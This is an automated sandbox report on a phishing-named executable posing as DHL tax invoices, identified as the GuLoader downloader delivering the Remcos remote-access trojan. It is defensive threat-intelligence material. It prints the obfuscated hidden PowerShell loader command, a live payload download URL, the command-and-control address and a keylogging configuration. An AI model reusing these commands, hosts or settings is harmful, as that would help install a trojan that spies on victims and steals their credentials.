Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL TAX INVOICES - MARCH 2024.exe

Overview

General Information

Sample name:DHL TAX INVOICES - MARCH 2024.exe
Analysis ID:1416845
MD5:9751f18fb374bf112f867381a68bb3a9
SHA1:b6690412b3ce7e65d76437b4d6704a3646e62938
SHA256:d53afbfc333acb95639354fe5eb9cddce8fc0f59190d23dbfa60fec9944a5e27
Tags:DHLexeRATRemcosRAT
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Obfuscated command line found
Powershell drops PE file
Sample uses process hollowing technique
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Too many similar processes found
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DHL TAX INVOICES - MARCH 2024.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe" MD5: 9751F18FB374BF112F867381A68BB3A9)
    • powershell.exe (PID: 4908 cmdline: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7256 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7824 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7952 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7960 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7968 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7976 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7992 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8000 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8008 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8016 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8040 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8048 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8056 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8064 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8072 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8080 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8088 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8096 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8104 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8120 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8136 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8144 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8152 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8160 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8168 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8176 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 8184 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5444 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 6128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 2004 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7256 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7276 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "162.251.122.89:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EEMA4A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000001.00000002.2320550123.000000000B115000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 7824JoeSecurity_RemcosYara detected Remcos RATJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7824, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tiueqehedmypqbeu", ProcessId: 7952, ProcessName: wab.exe
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4908, TargetFilename: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exe
              Sigma detected: Potential Dosfuscation Activity
              Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7256, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", CommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", ParentImage: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe, ParentProcessId: 1228, ParentProcessName: DHL TAX INVOICES - MARCH 2024.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Panoramic=Get-Content 'C:\Users\user\AppData\Local\releve\Handelshindringens.Dec';$Voldtgtsforbryders=$Panoramic.SubString(51097,3);.$Voldtgtsforbryders($Panoramic)", ProcessId: 4908, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7824, TargetFilename: C:\ProgramData\remcos\logs.dat

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Found malware configuration
              Source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "162.251.122.89:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-EEMA4A", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exeVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for submitted file
              Source: DHL TAX INVOICES - MARCH 2024.exeVirustotal: Detection: 13%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2866475335.0000000002FAF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7824, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\releve\DHL TAX INVOICES - MARCH 2024.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: DHL TAX INVOICES - MARCH 2024.exeJoe Sandbox ML: detected
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: DHL TAX INVOICES - MARCH 2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbSt source: powershell.exe, 00000001.00000002.2317930133.0000000006D38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5Q source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2317930133.0000000006C80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000001.00000002.2320109196.0000000007EE6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2313644718.000000000079F000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
              Source: C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 162.251.122.89
              Source: global trafficTCP traffic: 192.168.2.4:49737 -> 162.251.122.89:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: global trafficHTTP traffic detected: GET /gDuOvMZLyhtbvV140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 83.137.157.76Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: unknownTCP traffic detected without corresponding DNS query: 83.137.157.76
              Source: global trafficHTTP traffic detected: GET /gDuOvMZLyhtbvV140.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 83.137.157.76Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: unknownDNS traffic detected: queries for: geoplugin.net
              Source: wab.exe, 00000007.00000002.2883921770.0000000023A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.bin
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.binQ
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.137.157.76/gDuOvMZLyhtbvV140.bini
              Source: wab.exe, 00000007.00000002.2870944268.000000000898B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2
              Source: wab.exe, 00000007.00000002.2870944268.00000000089B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
              Source: DHL TAX INVOICES - MARCH 2024.exe, DHL TAX INVOICES - MARCH 2024.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000001.00000002.2316833699.000000000580B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000001.00000002.2314356147.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.2314356147.00000000048F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000007.00000002.2884225115.0000000024340000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
